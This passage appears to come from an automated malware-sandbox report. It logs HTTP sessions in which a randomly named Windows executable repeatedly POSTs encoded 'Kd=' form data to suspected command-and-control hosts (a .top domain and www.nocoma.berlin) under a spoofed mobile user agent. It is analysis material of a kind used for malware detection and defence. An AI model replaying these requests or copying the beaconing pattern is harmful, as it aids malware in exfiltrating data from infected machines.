Jan 11, 2025 05:44:25.639854908 CET	708	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Sat, 11 Jan 2025 04:44:25 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50003	134.122.135.48	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:27.287427902 CET	1852	OUT	POST /vnow/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.jrcov55qgcxp5fwa.top Origin: http://www.jrcov55qgcxp5fwa.top Referer: http://www.jrcov55qgcxp5fwa.top/vnow/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 5a 44 2b 30 4a 35 38 5a 4f 68 73 39 57 58 38 2b 61 71 2b 54 51 75 53 56 45 34 6c 55 76 39 47 58 4c 63 31 36 64 65 64 46 4f 39 57 48 2f 4e 73 48 31 31 65 68 65 35 38 71 39 6a 75 6a 4e 38 33 35 61 54 55 48 4d 47 57 34 74 73 39 6b 31 55 4a 73 66 6e 65 61 6e 53 6c 6a 4b 45 44 4b 33 6b 4e 39 32 46 34 48 2b 75 49 4e 37 53 45 4d 4f 64 78 46 70 37 32 36 44 42 61 54 4e 73 79 42 45 42 33 66 50 73 59 69 64 5a 46 7a 71 41 52 76 63 52 52 44 4f 69 4e 4a 33 6c 56 41 52 56 30 2b 46 49 7a 46 72 52 48 41 62 55 48 6d 62 72 2b 6f 75 67 5a 69 71 41 41 4f 4e 4a 67 45 69 43 4a 6c 4d 56 47 61 31 4e 39 66 64 2f 2f 71 56 46 42 57 52 34 6d 65 6e 2f 46 31 77 48 6c 6e 6b 76 73 42 76 4a 32 71 6f 6a 77 79 7a 33 69 62 65 50 4e 4e 57 4e 51 59 45 46 53 51 41 32 52 72 68 4b 44 53 46 48 30 62 59 45 4e 4d 33 36 78 70 51 5a 72 73 51 79 5a 50 5a 72 4b 4d 33 47 65 76 6c 34 44 54 34 43 6b 68 55 6d 54 56 50 7a 63 71 65 35 35 39 71 4d 31 44 43 43 46 39 54 50 6b 7a 31 4a 4e 63 76 57 51 33 55 67 4d 33 41 4c 4f 6c 48 38 55 50 46 4c 4a [TRUNCATED] Data Ascii: Kd=ZD+0J58ZOhs9WX8+aq+TQuSVE4lUv9GXLc16dedFO9WH/NsH11ehe58q9jujN835aTUHMGW4ts9k1UJsfneanSljKEDK3kN92F4H+uIN7SEMOdxFp726DBaTNsyBEB3fPsYidZFzqARvcRRDOiNJ3lVARV0+FIzFrRHAbUHmbr+ougZiqAAONJgEiCJlMVGa1N9fd//qVFBWR4men/F1wHlnkvsBvJ2qojwyz3ibePNNWNQYEFSQA2RrhKDSFH0bYENM36xpQZrsQyZPZrKM3Gevl4DT4CkhUmTVPzcqe559qM1DCCF9TPkz1JNcvWQ3UgM3ALOlH8UPFLJ9sNZ7mrjGqmXbx64vdhimd/oY4XODJjucrxBaLoySnivTX/Mb8Pbwd+uFu7b5oCGUpZabyrE+kwDnOvRkL5hVeHls7xn6adnzxgJO875/klhYBhxno3dw+vlQeVX2X5lMK17kyOHAtY9G/OUyN/5mZmz2Dobnrf3jojJyHRqMUpj4tIX2E8Svb4niNWefWoMVRMBmHRjJ1eHxszhfdbCjapLbAdJ50Byu0ON7m6WdYaDpXjrUosqJ5fnEzlZH3/RiFOkNgc9q8Aa8Ymbka94sbcCSIulqLZ6rdkwo4oMIHxOkhJSw/OBnLtrOe3H7pEG3WF0bg/B1UO2KUJbVPiBeZMLZCfdCARgTwIxfe9xFP90sbZZjYJwUXAwaDuNudSitsY7IRWGtq+/uRaEAizbj4M4IaGg5XwU59Kl8qaoxiQDHvpbC3ZTZzQciK4mT65EotBr1e1GIqVwdk1TW878PLd4Rd9mny9h1HFOYhaPSdfzQd76DmWlInnqZSnp7KxucNjpcqnBW1BDUSndFluytivXWjV++ZHBorXetEh3RywF1TzkLDnXVRrQCjQ0br5RbjJVpit/f3DdbVt030V1TcIXAt5CW/6uYxM/8k+yEFeZmCOlmV+ya3n3z/4l8iyy7vAAXCjlxPpoBzomd4uBge2Mz7BX/2CGX0 [TRUNCATED]
Jan 11, 2025 05:44:28.175090075 CET	708	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Sat, 11 Jan 2025 04:44:28 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50004	134.122.135.48	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:29.842989922 CET	543	OUT	GET /vnow/?Kd=UBWUKOEAPjIWQHwFUqnmPtvrSslksdKNLvkuVvZ7KceDxf9/w1X4XetT7BOQN8HlQ1RQJiTovrcX/QNxOGaJuCojc3yZmj9g+0kp06Y6wkEoK+9lqojOZE6QDMSCPSaQNA==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.jrcov55qgcxp5fwa.top User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:44:30.715886116 CET	708	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Sat, 11 Jan 2025 04:44:30 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50005	217.160.0.167	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:35.778884888 CET	794	OUT	POST /orhf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.nocoma.berlin Origin: http://www.nocoma.berlin Referer: http://www.nocoma.berlin/orhf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 68 76 50 69 66 59 56 4a 54 31 31 44 69 5a 35 33 58 7a 4f 46 63 75 7a 4d 74 45 51 35 71 6b 54 73 75 63 53 73 49 48 39 58 6c 32 76 72 49 52 44 46 4a 56 54 33 6f 6a 69 6a 58 74 78 45 43 52 71 77 34 38 6b 4c 54 4b 50 63 7a 71 55 37 56 6e 34 67 77 34 6e 7a 49 6e 2f 6d 65 61 62 49 78 48 74 76 50 49 2f 4f 76 34 39 76 32 6b 6e 62 32 59 35 48 45 37 68 61 36 74 58 6f 67 74 59 4f 72 56 51 4c 69 4c 68 78 77 2f 2b 4a 50 6b 79 73 67 47 7a 36 57 36 6e 52 35 4e 59 70 62 55 35 52 54 70 61 56 56 69 58 42 4c 65 55 51 33 41 6f 49 53 37 50 4b 75 32 33 37 32 73 53 55 67 70 43 65 37 75 50 4e 52 73 71 5a 67 35 77 3d Data Ascii: Kd=hvPifYVJT11DiZ53XzOFcuzMtEQ5qkTsucSsIH9Xl2vrIRDFJVT3ojijXtxECRqw48kLTKPczqU7Vn4gw4nzIn/meabIxHtvPI/Ov49v2knb2Y5HE7ha6tXogtYOrVQLiLhxw/+JPkysgGz6W6nR5NYpbU5RTpaVViXBLeUQ3AoIS7PKu2372sSUgpCe7uPNRsqZg5w=
Jan 11, 2025 05:44:36.427649975 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Sat, 11 Jan 2025 04:44:36 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jan 11, 2025 05:44:36.427675009 CET	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50006	217.160.0.167	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:38.332938910 CET	814	OUT	POST /orhf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.nocoma.berlin Origin: http://www.nocoma.berlin Referer: http://www.nocoma.berlin/orhf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 68 76 50 69 66 59 56 4a 54 31 31 44 6b 35 4a 33 62 77 32 46 49 2b 7a 50 6f 45 51 35 6a 45 54 53 75 63 65 73 49 44 46 48 6c 46 4c 72 49 7a 62 46 49 52 50 33 70 6a 69 6a 50 39 78 46 4d 78 72 38 34 38 6f 63 54 4c 7a 63 7a 71 41 37 56 6e 6f 67 78 4b 50 73 4c 58 2f 67 57 36 62 4b 76 33 74 76 50 49 2f 4f 76 34 42 56 32 6c 44 62 32 73 46 48 48 59 35 5a 6b 39 58 70 32 64 59 4f 68 31 51 78 69 4c 67 63 77 39 61 33 50 6e 61 73 67 48 44 36 57 50 62 57 79 4e 59 6e 57 30 34 6a 58 38 33 4b 4e 77 61 4f 4d 38 52 43 30 44 6b 39 58 4e 2b 67 30 55 2f 54 6c 4d 2b 73 77 36 4b 70 71 65 75 6b 4c 50 36 70 2b 75 6c 67 45 30 33 38 75 6d 38 34 6d 61 46 43 47 73 4c 61 6f 67 37 6a Data Ascii: Kd=hvPifYVJT11Dk5J3bw2FI+zPoEQ5jETSucesIDFHlFLrIzbFIRP3pjijP9xFMxr848ocTLzczqA7VnogxKPsLX/gW6bKv3tvPI/Ov4BV2lDb2sFHHY5Zk9Xp2dYOh1QxiLgcw9a3PnasgHD6WPbWyNYnW04jX83KNwaOM8RC0Dk9XN+g0U/TlM+sw6KpqeukLP6p+ulgE038um84maFCGsLaog7j
Jan 11, 2025 05:44:38.985424042 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Sat, 11 Jan 2025 04:44:38 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jan 11, 2025 05:44:38.985467911 CET	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50007	217.160.0.167	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:40.884263992 CET	1831	OUT	POST /orhf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.nocoma.berlin Origin: http://www.nocoma.berlin Referer: http://www.nocoma.berlin/orhf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 68 76 50 69 66 59 56 4a 54 31 31 44 6b 35 4a 33 62 77 32 46 49 2b 7a 50 6f 45 51 35 6a 45 54 53 75 63 65 73 49 44 46 48 6c 46 44 72 4a 47 48 46 49 32 37 33 37 54 69 6a 52 74 78 59 4d 78 72 31 34 34 46 30 54 4c 2f 6d 7a 70 34 37 55 45 51 67 34 62 50 73 51 6e 2f 67 61 61 62 4a 78 48 74 36 50 49 50 4b 76 35 74 56 32 6c 44 62 32 74 56 48 54 62 68 5a 6d 39 58 6f 67 74 59 34 72 56 52 2f 69 50 4e 70 77 39 65 6e 50 58 36 73 6c 58 54 36 46 4a 50 57 2f 4e 5a 42 56 30 34 37 58 38 7a 76 4e 77 48 78 4d 39 6b 58 30 44 73 39 58 72 50 64 6e 33 50 57 7a 66 50 4e 38 36 4f 62 33 66 4f 42 46 65 6d 43 37 66 4a 55 42 67 37 56 6e 69 45 6f 74 70 51 54 5a 61 75 41 70 56 79 65 49 34 4a 45 59 61 48 4a 64 46 6a 38 54 69 6f 52 4f 2f 59 6e 49 6a 75 78 67 30 58 41 50 62 47 72 78 6b 59 52 47 39 66 4d 76 2f 59 68 2f 36 2f 4e 47 68 34 78 49 78 55 30 2b 6f 34 31 67 43 32 33 6d 49 79 50 58 73 50 6d 4d 63 35 44 6f 63 52 4d 33 2b 34 5a 4f 71 48 45 45 63 52 45 47 6d 34 64 5a 76 76 7a 41 45 77 37 41 42 64 53 6c 63 6f 67 48 6c 6d [TRUNCATED] Data Ascii: Kd=hvPifYVJT11Dk5J3bw2FI+zPoEQ5jETSucesIDFHlFDrJGHFI2737TijRtxYMxr144F0TL/mzp47UEQg4bPsQn/gaabJxHt6PIPKv5tV2lDb2tVHTbhZm9XogtY4rVR/iPNpw9enPX6slXT6FJPW/NZBV047X8zvNwHxM9kX0Ds9XrPdn3PWzfPN86Ob3fOBFemC7fJUBg7VniEotpQTZauApVyeI4JEYaHJdFj8TioRO/YnIjuxg0XAPbGrxkYRG9fMv/Yh/6/NGh4xIxU0+o41gC23mIyPXsPmMc5DocRM3+4ZOqHEEcREGm4dZvvzAEw7ABdSlcogHlmMZ39rBKcN6JPzBppQMz+30E+x8w42VoEchLC8OMLdLF2vm/66vXBhfeY0uiJxks6xlpYW7ONc4VALe/ShJlr5zwYBRxYMvXNVQVhaAnC8L3C5msbmbpwVNmEiI3N7j7tc2t7mC5N0A0F8OY2UE2om+RZVPrz06o5s/vKDwNRuN/kKNBaSiOYhwoxxXzOTj71TpsN07jzUg67IeF5ix+/jjx1A3MDmjeWPDka38JvzJVl/VjlFw9PHR6DPy8esX5Y2VkWBzTjnvtVzZUiUepZzpKHVIuVtMRo0LOmdWuR1fTnBjkKJJoNkH5VRqp+oh1L+/2umro9C45Tvc13cTnJ1DqG6RhjGS7TWGL51g8MRLziD89WlmZ3orej227HDqoy9zGE/h5PfN2UCHwsUl7n+O86VROP5pBlEcDsKuNsuQwJpsJr1hYjwlHeP0pFtL4gJEqt/yhhSBg3qxsXc20B7Pq28dzTLrilCQs0bo9fB4A+Pg1hL1xOC7TPmHBN6Be9fUsZI3O8jwEkbuBXeW0GmzEeP9N8k/Yz/n77V+IlIGdDHdwkyDvWdKpUmH3l61u+aUqBKca8OD8XJBFUh5SL0vD/pH99ne5wMPufP0/6n7wpe3XFQSR8X/2bIGn5EQOycO0Zb4ZH/EGsR0GsRYehNTpAjxmWMm67qs [TRUNCATED]
Jan 11, 2025 05:44:41.529701948 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Sat, 11 Jan 2025 04:44:41 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 